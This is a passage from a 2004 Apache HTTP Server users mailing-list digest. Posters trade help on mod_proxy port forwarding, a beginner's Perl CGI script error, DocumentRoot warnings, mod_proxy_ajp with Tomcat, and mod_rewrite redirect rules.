SIZE=3D2>---------------------------------------------------------------=
------</FONT>
<BR><FONT SIZE=3D2>The official User-To-User support forum of the =
Apache HTTP Server Project.</FONT>
<BR><FONT SIZE=3D2>See &lt;URL:<A =
HREF=3D"http://httpd.apache.org/userslist.html" =
TARGET=3D"_blank">http://httpd.apache.org/userslist.html</A>&gt; for =
more info.</FONT>
<BR><FONT SIZE=3D2>To unsubscribe, e-mail: =
users-unsubscribe@httpd.apache.org</FONT>
<BR><FONT SIZE=3D2>&nbsp;&nbsp; &quot;&nbsp;&nbsp; from the digest: =
users-digest-unsubscribe@httpd.apache.org</FONT>
<BR><FONT SIZE=3D2>For additional commands, e-mail: =
users-help@httpd.apache.org</FONT>
</P>

</BODY>
</HTML>
------_=_NextPart_001_01C4D98E.193BCF30--

------------------------------

Date: Fri, 3 Dec 2004 15:21:26 -0800 (PST)
To: users@httpd.apache.org
From: O-One <ola_one@yahoo.com>
Subject: RE: [users@httpd] Apache listening on :8081
Message-ID: <20041203232126.67242.qmail@web13801.mail.yahoo.com>

--0-1450120473-1102116086=:67240
Content-Type: text/plain; charset=us-ascii

I do not understand the part about the proxy. Can you possibly explain this
to a novice please.
 
Thank you.

"Nelson, Robert D." <RDNelson@Mail.Donaldson.com> wrote:
> I am trying to install my Apache on a Windows 2003 Server. Knowing that
> Apache by default is on Port 80. If I put Apache on say Port 8081, is it
> true that because of that, when anyone needs to reach my site, instead of
> typing www.abc.com they must now type www.abc.com:8081 

That's true.

> I need to use a port other than Port 80 to host Apache, if the above
> statement is true, is there a way to work around having to put the number
> at the end of the site name? 

When a user doesn't type in a port number, the browser assumes :80. There is
no way around this. However, you could always proxy from a server on :80 to
your server on :8081. That usually works well.

~ Robert

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

		
---------------------------------
Do you Yahoo!?
 Dress up your holiday email, Hollywood style. Learn more.
--0-1450120473-1102116086=:67240
Content-Type: text/html; charset=us-ascii

<DIV>I do not understand the part about the proxy. Can you possibly explain
this to a novice please.</DIV>
<DIV>&nbsp;</DIV>
<DIV>Thank you.<BR><BR><B><I>"Nelson, Robert D."
&lt;RDNelson@Mail.Donaldson.com&gt;</I></B> wrote:</DIV>
<BLOCKQUOTE class=replbq style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px;
BORDER-LEFT: #1010ff 2px solid">&gt; I am trying to install my Apache on a
Windows 2003 Server. Knowing that<BR>&gt; Apache by default is on Port 80.
If I put Apache on say Port 8081, is it<BR>&gt; true that because of that,
when anyone needs to reach my site, instead of<BR>&gt; typing www.abc.com
they must now type www.abc.com:8081 <BR><BR>That's true.<BR><BR>&gt; I need
to use a port other than Port 80 to host Apache, if the above<BR>&gt;
statement is true, is there a way to work around having to put the
number<BR>&gt; at the end of the site name? <BR><BR>When a user doesn't type
in a port number, the browser assumes :80. There is<BR>no way around this.
However, you could always proxy from a server on :80 to<BR>your server on
:8081. That usually works well.<BR><BR>~
Robert<BR><BR><BR>----------------------------------------------------------
-----------<BR>The official User-To-User support forum of the Apache HTTP
 Server Project.<BR>See <URL:http: userslist.html httpd.apache.org>for more
info.<BR>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org<BR>"
from the digest: users-digest-unsubscribe@httpd.apache.org<BR>For additional
commands, e-mail:
users-help@httpd.apache.org<BR><BR></BLOCKQUOTE></URL:http:><p>
		<hr size=1>Do you Yahoo!?<br> 
Dress up your holiday email, Hollywood style. <a
href="http://us.rd.yahoo.com/evt=29909/*http://celebrity.mail.yahoo.com">Lea
rn more.</a>
--0-1450120473-1102116086=:67240--

------------------------------

Date: Fri, 3 Dec 2004 17:28:49 -0600 
To: "'users@httpd.apache.org'" <users@httpd.apache.org>
From: "Nelson, Robert D." <RDNelson@Mail.Donaldson.com>
Subject: RE: [users@httpd] Apache listening on :8081
Message-ID: <11864A3328DDD5119DE70002A540D64A110ACD23@ntblm16>

> I do not understand the part about the proxy. Can you possibly explain
this
> to a novice please.

Please post in plain text.

The proxy for Apache is called 'mod_proxy'. It's very well documented:

 http://httpd.apache.org/docs-2.0/mod/mod_proxy.html

Basically, when mod_proxy is running you simply add a couple lines to the
config. Here's a really generic example:

<VirtualHost 1.2.3.4:80>
    ServerName www.yourdomain.com

    ProxyPass / http://www.yourdomain.com:8081/
    ProxyPassReverse / http://www.yourdomain.com:8081/
</VirtualHost>

It's not very difficult to set up. Of course, the server that you're using
as the proxy has to bind to :80.

 ~ Robert

------------------------------

Date: Fri, 3 Dec 2004 16:48:23 -0700 
To: "'users@httpd.apache.org'" <users@httpd.apache.org>
From: Patrick Campbell <PCampbell@ourvacationstore.com>
Subject: RE: [users@httpd] Apache listening on :8081
Message-ID:
<202DB470B8484B469E8B4302E44A71390AA58580@mail.ourvacationstore.com>

It sounds more like he maybe trying to get around a firewall that blocks
incoming port 80.  He doesn't want the end user to have to type in the port
number.  There is no "Real" way around that.  There's a lot of work arounds.
You could do web forward using ZoneEdit to forward www.yourdomain.com to
www2.yourdomain.com:8080.  That is the best way to do it if you are heartset
on hosting from this place where Apache can't listen on 80.  ZoneEdit is
free.  ProxyPass could work depending on the situation, as could a number of
other things.  He needs to explain more in detail why he can't run on port
80 and what else he has to work with.

Patrick Campbell 
OurVacationStore.com
Website Administrator
pcampbell@ourvacationstore.com

-----Original Message-----
From: Nelson, Robert D. [mailto:RDNelson@Mail.Donaldson.com] 
Sent: Friday, December 03, 2004 4:29 PM
To: 'users@httpd.apache.org'
Subject: RE: [users@httpd] Apache listening on :8081

> I do not understand the part about the proxy. Can you possibly explain
this
> to a novice please.

Please post in plain text.

The proxy for Apache is called 'mod_proxy'. It's very well documented:

 http://httpd.apache.org/docs-2.0/mod/mod_proxy.html

Basically, when mod_proxy is running you simply add a couple lines to the
config. Here's a really generic example:

<VirtualHost 1.2.3.4:80>
    ServerName www.yourdomain.com

    ProxyPass / http://www.yourdomain.com:8081/
    ProxyPassReverse / http://www.yourdomain.com:8081/ </VirtualHost>

It's not very difficult to set up. Of course, the server that you're using
as the proxy has to bind to :80.

 ~ Robert

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info. To
unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

------------------------------

Date: Sat, 4 Dec 2004 07:54:19 -0800 (PST)
To: users@httpd.apache.org
From: O-One <ola_one@yahoo.com>
Subject: RE: [users@httpd] Apache listening on :8081
Message-ID: <20041204155419.97394.qmail@web13823.mail.yahoo.com>

--0-1034235630-1102175659=:93732
Content-Type: text/plain; charset=us-ascii

I have a situation where Microsoft Exchange 2003 is installed on one Machine
and OWA is coming out of port 80, while the other machine is an Apache
webserver. Unfortunately, I have a small DSL Router and one WAN IP address.
So my Exchange server will have Ports 25, 80, and 110 opened at the minimum,
so the two Machines cannot have both Port 80 opened to the same router. At
least that is what I think. 
 
Am I correct? 

Patrick Campbell <PCampbell@ourvacationstore.com> wrote:
It sounds more like he maybe trying to get around a firewall that blocks
incoming port 80. He doesn't want the end user to have to type in the port
number. There is no "Real" way around that. There's a lot of work arounds.
You could do web forward using ZoneEdit to forward www.yourdomain.com to
www2.yourdomain.com:8080. That is the best way to do it if you are heartset
on hosting from this place where Apache can't listen on 80. ZoneEdit is
free. ProxyPass could work depending on the situation, as could a number of
other things. He needs to explain more in detail why he can't run on port
80 and what else he has to work with.

Patrick Campbell 
OurVacationStore.com
Website Administrator
pcampbell@ourvacationstore.com

-----Original Message-----
From: Nelson, Robert D. [mailto:RDNelson@Mail.Donaldson.com] 
Sent: Friday, December 03, 2004 4:29 PM
To: 'users@httpd.apache.org'
Subject: RE: [users@httpd] Apache listening on :8081

> I do not understand the part about the proxy. Can you possibly explain
this
> to a novice please.

Please post in plain text.

The proxy for Apache is called 'mod_proxy'. It's very well documented:

http://httpd.apache.org/docs-2.0/mod/mod_proxy.html

Basically, when mod_proxy is running you simply add a couple lines to the
config. Here's a really generic example:

ServerName www.yourdomain.com

ProxyPass / http://www.yourdomain.com:8081/
ProxyPassReverse / http://www.yourdomain.com:8081/ 

It's not very difficult to set up. Of course, the server that you're using
as the proxy has to bind to :80.

~ Robert

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info. To
unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

		
---------------------------------
Do you Yahoo!?
 All your favorites on one personal page  Try My Yahoo!
--0-1034235630-1102175659=:93732
Content-Type: text/html; charset=us-ascii

<DIV>I have a situation where Microsoft Exchange 2003 is installed on one
Machine and OWA is coming out of port 80, while the other machine is an
Apache webserver. Unfortunately, I have a small DSL Router&nbsp;and one WAN
IP address. So my Exchange server will have Ports 25, 80, and 110 opened at
the minimum,&nbsp;so the two Machines cannot have both Port 80 opened to the
same router. At least that is what I think. </DIV>
<DIV>&nbsp;</DIV>
<DIV>Am I correct?&nbsp;<BR><BR><B><I>Patrick Campbell
&lt;PCampbell@ourvacationstore.com&gt;</I></B> wrote:</DIV>
<BLOCKQUOTE class=replbq style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px;
BORDER-LEFT: #1010ff 2px solid">It sounds more like he maybe trying to get
around a firewall that blocks<BR>incoming port 80. He doesn't want the end
user to have to type in the port<BR>number. There is no "Real" way around
that. There's a lot of work arounds.<BR>You could do web forward using
ZoneEdit to forward www.yourdomain.com to<BR>www2.yourdomain.com:8080. That
is the best way to do it if you are heartset<BR>on hosting from this place
where Apache can't listen on 80. ZoneEdit is<BR>free. ProxyPass could work
depending on the situation, as could a number of<BR>other things. He needs
to explain more in detail why he can't run on port<BR>80 and what else he
has to work with.<BR><BR>Patrick Campbell
<BR>OurVacationStore.com<BR>Website
Administrator<BR>pcampbell@ourvacationstore.com<BR><BR><BR>-----Original
Message-----<BR>From: Nelson, Robert D. [mailto:RDNelson@Mail.Donaldson.com]
<BR>Sent: Friday, December 03,
 2004 4:29 PM<BR>To: 'users@httpd.apache.org'<BR>Subject: RE: [users@httpd]
Apache listening on :8081<BR><BR><BR>&gt; I do not understand the part about
the proxy. Can you possibly explain<BR>this<BR>&gt; to a novice
please.<BR><BR>Please post in plain text.<BR><BR>The proxy for Apache is
called 'mod_proxy'. It's very well
documented:<BR><BR>http://httpd.apache.org/docs-2.0/mod/mod_proxy.html<BR><B
R>Basically, when mod_proxy is running you simply add a couple lines to
the<BR>config. Here's a really generic example:<BR><BR><VIRTUALHOST
1.2.3.4:80><BR>ServerName www.yourdomain.com<BR><BR>ProxyPass /
http://www.yourdomain.com:8081/<BR>ProxyPassReverse /
http://www.yourdomain.com:8081/ </VIRTUALHOST><BR><BR>It's not very
difficult to set up. Of course, the server that you're using<BR>as the proxy
has to bind to :80.<BR><BR>~
Robert<BR><BR><BR>----------------------------------------------------------
-----------<BR>The official User-To-User support forum of the Apache HTTP
Server
 Project.<BR>See <URL:http: userslist.html httpd.apache.org>for more info.
To<BR>unsubscribe, e-mail: users-unsubscribe@httpd.apache.org<BR>" from the
digest: users-digest-unsubscribe@httpd.apache.org<BR>For additional
commands, e-mail:
users-help@httpd.apache.org<BR><BR>-----------------------------------------
----------------------------<BR>The official User-To-User support forum of
the Apache HTTP Server Project.<BR>See <URL:http: userslist.html
httpd.apache.org>for more info.<BR>To unsubscribe, e-mail:
users-unsubscribe@httpd.apache.org<BR>" from the digest:
users-digest-unsubscribe@httpd.apache.org<BR>For additional commands,
e-mail:
users-help@httpd.apache.org<BR><BR></BLOCKQUOTE></URL:http:></URL:http:><p>
		<hr size=1>Do you Yahoo!?<br> 
All your favorites on one personal page  <a href="http://my.yahoo.com">Try
My Yahoo!</a>
--0-1034235630-1102175659=:93732--

------------------------------

Date: Fri, 3 Dec 2004 19:22:42 -0500
To: users@httpd.apache.org
From: Ben Kuang <bensdomain12@gmail.com>
Subject: Re: [users@httpd] internal error running cgi script
Message-ID: <a3a760de04120316221f8844ee@mail.gmail.com>

I changed the typo:

#! /usr/bin/perl -w
#script1.pl 
print "content-type: text/html\n\n";
read(STDIN, $formdat, $ENV{'CONTENT_LENGTH'});
print "<HTML><HEAD>\n";
print "<TITLE>Echo Form Data</TITLE>\n";
print "</HEAD><BODY>\n";
print "Here is what was collected\n";
print "<HR>\n";
@namevals = split(/&/, $formdat);
foreach (@namevals){
	tr/+/ /;
	s/%(..)/pack("C", hex($1))/ge;
	print "$_<BR>\n";
}
print "<P><HR>\n";
print "</BODY>\n</HTML>\n";

this is what the script looks like now.  And yes the script does exist
in C:\Program Files\Apache Group\Apache2\cgi-bin.  but i still cannot
run it

On Fri, 03 Dec 2004 15:26:23 -0600, Aman Raheja <araheja@techquotes.com>
wrote:
> last line should be
> 
> print "</BODY>\n</HTML>\n";
> 
> not
> 
> print "</BODY>\n</HTML>\n;
> 
> you are missing a "
> 
> checl error logs in future, you'll know syntax probs.
> Aman Raheja
> 
> 
> 
> 
> Ben Kuang wrote:
> 
> >Hi everyone:
> >
> >I am learning cgi scripting and running apache locally.  I have a form
> >in html that takes user input, and a cgi script in perl, to print on
> >screen what the user has entered:
> >
> >Here is the html document, place in htdocs dir:
> >
> ><html>
> ><body>
> ><b><font size=6>Test</font></b>
> ><hr>
> >
> ><form method="post" action="../cgi-bin/script1.pl">
> ><textarea name="comment" rows=8 cols=68></textarea>
> >
> ><br>
> ><input type=submit value="Send">
> ><input type=reset value="Reset">
> ></form>
> >
> ></body>
> ></html>
> >
> >Here is my cgi script script1.pl, in perl, located in cgi-bin dir:
> >
> >#! /usr/bin/perl -w
> >#script1.pl
> >print "content-type: text/html\n\n";
> >read(STDIN, $format, $ENV{'CONTENT_LENGTH'});
> >print "<HTML><HEAD>\n";
> >print "<TITLE>Echo Form Data</TITLE>\n";
> >print "</HEAD><BODY>\n";
> >print "Here is what was collected\n";
> >print "<HR>\n";
> >@namevals = split(/&/, $formdat);
> >foreach (@namevals){
> >       tr/+/ /;
> >       s/%(..)/pack("C", hex($1))/ge;
> >       print "$_<BR>\n";
> >}
> >print "<P><HR>\n";
> >print "</BODY>\n</HTML>\n;
> >
> >This is the error i get when I try to run the script:
> >
> >Internal Server Error
> >
> >The server encountered an internal error or misconfiguration and was
> >unable to complete your request.
> >
> >Please contact the server administrator, bensdomain12@gmail.com and
> >inform them of the time the error occurred, and anything you might
> >have done that may have caused the error.
> >
> >More information about this error may be available in the server error
log.
> >
> >Can anyone please help me with this problem.  Thank you very much in
advance.
> >
> >I am running apche in a windows environment, not *nix.
> >
> >Sincerely,
> >
> >Ben Kuang
> >
> >---------------------------------------------------------------------
> >The official User-To-User support forum of the Apache HTTP Server
Project.
> >See <URL:http://httpd.apache.org/userslist.html> for more info.
> >To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> >   "   from the digest: users-digest-unsubscribe@httpd.apache.org
> >For additional commands, e-mail: users-help@httpd.apache.org
> >
> >
> >
> >
> 
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>    "   from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
> 
>

------------------------------

Date: Fri, 3 Dec 2004 21:53:58 -0500
To: users@httpd.apache.org, Ben Kuang <bensdomain12@gmail.com>
From: Joshua Slive <jslive@gmail.com>
Subject: Re: [users@httpd] internal error running cgi script
Message-ID: <e498c16604120318536f6d9fec@mail.gmail.com>

On Fri, 3 Dec 2004 19:22:42 -0500, Ben Kuang <bensdomain12@gmail.com> wrote:
> I changed the typo:
> 
> #! /usr/bin/perl -w

Is perl really located at /usr/bin on the same drive as apache?

Check the ScriptInterpreterSource directive.

Joshua.

------------------------------

Date: Fri, 3 Dec 2004 19:48:22 -0800
To: users@httpd.apache.org
From: Eric Wagar <eric@deadhookers.org>
Subject: Why is DocumentRoot returning an error
Message-Id: <200412031948.22615.eric@deadhookers.org>

When ever I restart my 2.0.40 server, I receive these in the
/var/log/messages 
log:
Dec  3 19:31:32 sm httpd: Warning: DocumentRoot [/var/www/html] does not
exist

But, as you can see, I don't have a DocumentRoot /var/www/html
[root@sm log]# grep -i documentroot /etc/httpd/conf/httpd.conf
        DocumentRoot /var/www/sites/default
#        DocumentRoot /var/www/sites/test.net
#        DocumentRoot /var/www/sites/test2.net
        DocumentRoot /var/www/sites/www.media.com
        DocumentRoot /var/www/sites/old-www.media.com

Is Apache simply thinking that there should be a /var/www/html dir?  If so, 
why?  And, how do I get rid of that message?

Thanks
eric

------------------------------

Date: Fri, 3 Dec 2004 20:55:08 -0800
To: users@httpd.apache.org
From: ms419@freezone.co.uk
Subject: "if CGI enabled" condition
Message-Id: <ABC0CB6C-45B0-11D9-AFD9-0003931DA24A@freezone.co.uk>

How can we make some directives conditional, depending on whether CGI 
execution is enabled?

We tried:

	<IfModule mod_cgi.c>
		Action filter /~ucc/filter.sh
		SetHandler filter
	</IfModule>

But these directives are used even when CGI execution is disabled, 
since (I guess) mod_cgi.c is still loaded.

Any suggestions?

Many thanks!

Jack

------------------------------

Date: Sat, 4 Dec 2004 09:59:54 -0500
To: users@httpd.apache.org
From: Joshua Slive <jslive@gmail.com>
Subject: Re: [users@httpd] "if CGI enabled" condition
Message-ID: <e498c16604120406593afc545e@mail.gmail.com>

On Fri, 3 Dec 2004 20:55:08 -0800, ms419@freezone.co.uk
<ms419@freezone.co.uk> wrote:
> How can we make some directives conditional, depending on whether CGI
> execution is enabled?

There is no direct way.  But you can use an <IfDefine> combined with
the -D command line option to enclose both your CGI-activation
directives and any other directives which depend on them.

Joshua.

------------------------------

Date: Sat, 04 Dec 2004 08:27:41 +0300
To: users@httpd.apache.org
From: Mitya <mitya@cargosoft.ru>
Subject: mod_proxy_ajp experience
Message-Id: <1102138061.24053.34.camel@mitya>

Hi all,

I'm now trying 2.0.52 with mod_proxy_ajp from the SVN trunk (compiles
OK, just made two small patches, concerning APR_DECLARE_OPTIONAL_FN and
ap_log_cerror). MandrakeLinux 10.0, kernel 2.6.3, glibc 2.3.3, gcc
3.3.2.

I was hoping the brand new mod_proxy_ajp should finally help me to solve
that well-known problem of "mounting" Tomcat web-app from, say,
http://myhost:8080/foo to http://myhost/bar/baz/ (or any location other
than /foo) via AJP. This problem has no solution with mod_jk2 +
mod_rewrite because URLs do not rich mod_jk2's handler after they are
processed with mod_rewrite (either with [PT] at the end of RewriteRule
or without). Also, mod_proxy_http is inacceptable: web-apps lose some
important information (client IP, original URL) if our connections are
proxied through HTTP.

Seems like mod_proxy_ajp is not a cure either. :(

Are the wollowing statement pairs supposed to yield the same?

ProxyPass /bar ajp://myhost:8009/foo
ProxyPassReverse /bar ajp://myhost:8009/foo

and

ProxyPass /baz http://myhost:8080/foo
ProxyPassReverse /baz http://myhost:8080/foo

In the first case, we receive "404 - /bar" from Tomcat.
The second case gives us just what we want (the contents of /foo webapp
under /baz location), but in fact it isn't (proxied connection - see
above).

Again, mod_rewrite doesn't work with the new mod_proxy_ajp. I've tried

RewriteEngine On
RewriteRule /bar(.*) /foo$1 [PT]
ProxyPass /foo ajp://myhost:8009/foo
ProxyPassReverse /foo ajp://myhost:8009/foo

(with or without [PT]) and

RewriteRule /bar(.*) ajp://myhost:8009/foo$1 [P]

Both combinations do not work.

Does anyone have similar experience with mod_proxy_ajp, and probably
someone possesses a solution?

Would it be better to cross-post this to devel mailing list?

Thanks! 
Dimitri

------------------------------

Date: Sat, 4 Dec 2004 08:13:27 +0000
To: users@httpd.apache.org
From: Andrew M <andrew@jibeya.com>
Subject: RewriteRule problem....
Message-Id: <6005A0B4-45CC-11D9-8B21-0003938366A4@jibeya.com>

Hi,
i'm trying to construct a rewriterule which checks for a particular 
file extension and then redirects the user to the https equivalent of 
the file, so:

<IfModule mod_ssl.c>
     Include conf/ssl.conf
</IfModule>
....
RewriteEngine on

RewriteRule (.*)\.(ssl)$ https://localhost:8080/mysite/$1.$2 [P,L]

but i'm getting a 500 internal server error. Any ideas?

regards

Andrew

------------------------------

Date: Sat, 4 Dec 2004 08:42:44 +0000
To: users@httpd.apache.org
From: Andrew M <andrew@jibeya.com>
Subject: Re: [users@httpd] RewriteRule problem....
Message-Id: <77BF017E-45D0-11D9-8B21-0003938366A4@jibeya.com>

Ok,
I have a solution:

RewriteRule (.*)\.(ssl)$ https://%{SERVER_NAME}/$1.$2 [R]

But why is:

http://127.0.0.1/test.ssl

being rewritten as

https://127.0.0.1//test.ssl

in the url? how can I remove the // before test?

regards

Andrew
On 4 Dec 2004, at 08:13, Andrew M wrote:

> Hi,
> i'm trying to construct a rewriterule which checks for a particular 
> file extension and then redirects the user to the https equivalent of 
> the file, so:
>
> <IfModule mod_ssl.c>
>     Include conf/ssl.conf
> </IfModule>
> ....
> RewriteEngine on
>
> RewriteRule (.*)\.(ssl)$ https://localhost:8080/mysite/$1.$2 [P,L]
>
> but i'm getting a 500 internal server error. Any ideas?
>
> regards
>
> Andrew
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server 
> Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>   "   from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>

------------------------------

Date: Sat, 4 Dec 2004 12:18:03 +0000
To: users@httpd.apache.org
From: Andrew M <andrew@jibeya.com>
Subject: Re: [users@httpd] RewriteRule problem....
Message-Id: <8BE9C2F7-45EE-11D9-8B21-0003938366A4@jibeya.com>

Problem resolved...

RewriteRule (.*)\.(ssl)$ https://%{SERVER_NAME}$1.$2 [R]

Andrew

On 4 Dec 2004, at 08:42, Andrew M wrote:

> Ok,
> I have a solution:
>
> RewriteRule (.*)\.(ssl)$ https://%{SERVER_NAME}/$1.$2 [R]
>
> But why is:
>
> http://127.0.0.1/test.ssl
>
> being rewritten as
>
> https://127.0.0.1//test.ssl
>
> in the url? how can I remove the // before test?
>
> regards
>
> Andrew
> On 4 Dec 2004, at 08:13, Andrew M wrote:
>
>> Hi,
>> i'm trying to construct a rewriterule which checks for a particular 
>> file extension and then redirects the user to the https equivalent of 
>> the file, so:
>>
>> <IfModule mod_ssl.c>
>>     Include conf/ssl.conf
>> </IfModule>
>> ....
>> RewriteEngine on
>>
>> RewriteRule (.*)\.(ssl)$ https://localhost:8080/mysite/$1.$2 [P,L]
>>
>> but i'm getting a 500 internal server error. Any ideas?
>>
>> regards
>>
>> Andrew
>>
>>
>> ---------------------------------------------------------------------
>> The official User-To-User support forum of the Apache HTTP Server 
>> Project.
>> See <URL:http://httpd.apache.org/userslist.html> for more info.
>> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>>   "   from the digest: users-digest-unsubscribe@httpd.apache.org
>> For additional commands, e-mail: users-help@httpd.apache.org
>>
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server 
> Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>   "   from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>

------------------------------

Date: Sat, 4 Dec 2004 01:21:30 -0700 (MST)
To: users@httpd.apache.org
From: "Don Raikes" <don@draikes.com>
Subject: mod_rewrite blocking a client-side map
Message-ID: <43913.148.87.1.171.1102148490.squirrel@www.draikes.com>

Hello,

I have an apache 1.3 server running on a sunos box. I am using it to 
serve as a proxy to access an oracle oc4j server with an application
running on it.

In the application client-side maps with area tags with shape attributes
are used to render tabs and buttons.
If I go directly to the oc4j server to access the application, the tabs
and buttons showup fine.
If I use the apache server to access the applicaiton, the buttons are all
run together and the tabs do not show up at all.

Is there any reason that in a virtualhost using mod_rewrite that these map
elements should not be showing up? The alt text for the area tags are
being displayed.

I checked the rendered html from both the proxied and non-proxied pages
and they are exactly the same.
-- 
Thanks,
Don Raikes, webmaster
http://www.draikes.com
promoting family values and genealogical research

------------------------------

Date: Sat, 4 Dec 2004 11:18:17 -0500
To: <users@httpd.apache.org>
From: "Mack Lundy" <malund@wm.edu>
Subject: RE: [users@httpd] Error Message:  [warn] (128)Network is
unreachable: connect to listener
Message-Id: <200412041618.BPA63960@md4001.it.wm.edu>

Joe,

This took care of the problem.  Thanks very much.

Mack

-----Original Message-----
From: Joe Orton [mailto:jorton@redhat.com] 
Sent: Friday, November 26, 2004 6:32 AM
To: users@httpd.apache.org
Subject: Re: [users@httpd] Error Message: [warn] (128)Network is
unreachable: connect to listener

On Thu, Nov 25, 2004 at 08:03:04PM -0500, Mack Lundy wrote:
> I have this in ssl.conf
> Listen 443
> 
> And this in httpd.conf
> 
> Listen 80
> 
> I just accepted the defaults.

Can you try changing these to "Listen 0.0.0.0:443" and :80 respectively?

joe

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

------------------------------

Date: Sat, 4 Dec 2004 09:34:03 -0700 (MST)
To: users@httpd.apache.org
From: "Don Raikes" <don@draikes.com>
Subject: rewriterule problem: .css or .xss not being processed
Message-ID: <33196.216.39.182.127.1102178043.squirrel@www.draikes.com>

-- 
Thanks,
Don Raikes, webmaster
http://www.draikes.com
promoting family values and genealogical researchHello,

I am using mod_rewrite to  access pages on an oracle oc4j webserver from
my apache server.

All is working except it appears that either the .css or .xss file is not
being processed since some formatting from the stylesheet is not being
applied.

my virtualhost block is as follows:
<VirtualHost *>
    ServerAdmin don.raikes@oracle.com
    ServerName staccessibility.us.oracle.com
#    DocumentRoot " /var/apache/htdocs1"
    ErrorLog /var/apache/logs/staccessibility-error.log
    RewriteEngine On
#    RewriteRule (.*)\.css
http://access.us.oracle.com:8888/st-acc2/cabo/styles/cache/$1.css [P,L]
#    RewriteRule (.*)\.xss
http://access.us.oracle.com:8888/st-acc2/cabo/styles/$1.xss [P,L]
    RewriteRule (.*)\.uix http://access.us.oracle.com:8888/st-acc2/$1.uix
[P,L]
    RewriteRule (.*)\.uit http://access.us.oracle.com:8888/st-acc2/$1.uit
[P,L]
    RewriteRule (.*)oraclelogo.gif
http://access.us.oracle.com:8888/st-acc2/oraclelogo.gif [P,L]
    rewriteRule (.*)disabled3.gif
http://access.us.oracle.com:8888/st-acc2/disabled3.gif [P,L]
    RewriteRule (.*)\.gif
http://access.us.oracle.com:8888/st-acc2/cabo/images/cache/$1.gif [P]
    RewriteRule (.*)\.gif
http://access.us.oracle.com:8888/st-acc2/cabo/images/$1.gif [P,L]
    RewriteRule ^(.*) http://access.us.oracle.com:8888/st-acc2/home.uix$1
[P]
    RewriteLog /var/apache/logs/staccessibility-rewrite.log
    ProxyPassReverse / http://access.us.oracle.com:8888/st-acc2/
</VirtualHost>

Nothing is appearing in my rewrite log file or in my error_log file to
suggest it isn't finding one of these files.

The reason I suspect this is the problem is that I opened the page
directly from the oc4j server and saved the html then I opened it from the
apache server and saved the html again.

The files are no different, and when I double click on the saved files in
windows explorer, they look identical.

When I view the pages from the two servers, the one viewed through the
apache server is missing some formatting and the visual tabs and buttons
are missing (this is the same as when I view the saved files with no .css
or .xss files available).

------------------------------

Date: Sat, 4 Dec 2004 17:02:26 +0000
To: users@httpd.apache.org
From: Andrew M <andrew@jibeya.com>
Subject: RewriteRule - if Not
Message-Id: <4630DBE0-4616-11D9-8B21-0003938366A4@jibeya.com>

Hi,
I am trying to construct a statement using RewriteRules which says:

1. If you are A redirect to https
2. if you are B redirect to https
3. if you are not A or B redirect to http

So I tried:

RewriteRule (.register)\.(xml)$ https://%{SERVER_NAME}$1.$2 [R,L]
RewriteRule (.confirmStage)\.(xml)$ https://%{SERVER_NAME}$1.$2 [R,L]
RewriteRule ^/(.register | confirmStage)\.(xml)$ 
http://%{SERVER_NAME}$1.$2 [R]

The first 2 lines work fine, but the last one does not. What am I doing 
wrong?

regards

Andrew

------------------------------

Date: Sat, 4 Dec 2004 12:11:37 -0500
To: <users@httpd.apache.org>
From: "Leif W" <warp-9.9@usa.net>
Subject: Re: [users@httpd] RewriteRule - if Not
Message-ID: <000401c4da24$50b42e80$0a01a8c0@enterprise>

> Andrew M, Saturday, December 04, 2004 12:02
>
> RewriteRule ^/(.register | confirmStage)\.(xml)$
> http://%{SERVER_NAME}$1.$2 [R]
>
> The first 2 lines work fine, but the last one does not. What am I
doing
> wrong?

I know ^ is the beginning of line marker in a regular expression, not a
negation character.  I believe !is the negation character.  Read the
manual about rewriting, especially the rewriting guide.

http://your-favorite-mirror/manual/misc/rewriteguide.html

Leif

------------------------------

End of users Digest
***********************************


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message